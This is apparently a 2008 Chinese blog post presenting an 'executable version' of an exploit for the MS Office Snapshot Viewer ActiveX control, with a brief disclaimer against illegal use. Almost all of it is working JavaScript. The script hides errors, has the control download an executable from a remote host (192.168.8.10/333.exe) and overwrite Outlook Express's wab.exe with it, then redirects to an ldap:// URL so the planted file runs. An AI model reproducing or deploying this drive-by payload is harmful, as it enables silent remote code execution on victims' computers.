MS Office Snapshot Viewer ActiveX Exploit (可执行版)
by:lcx |
可执行版,请勿用于非法用途。 <script type="text/javascript"> function killErrors() { return true; } window.onerror = killErrors; var x; var obj; var mycars = new Array(); mycars[0] = "c:/Program Files/Outlook Express/wab.exe"; mycars[1] = "d:/Program Files/Outlook Express/wab.exe"; mycars[2] = "e:/Program Files/Outlook Express/wab.exe"; var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1"); if(objlcx="[object]") { setTimeout('window.location = "ldap://"',3000); for (x in mycars) { obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1") var buf1 = 'http://192.168.8.10/333.exe'; var buf2=mycars[x]; obj.Zoom = 0; obj.ShowNavigationButtons = false; obj.AllowContextMenu = false; obj.SnapshotPath = buf1; try { obj.CompressedPath = buf2; obj.PrintSnapshot(); }catch(e){} } } </script> |
Posted in : by : YullinJuly 17, 20080 CommentsTag : 漏洞, office, exploit, Ubuntu Linux
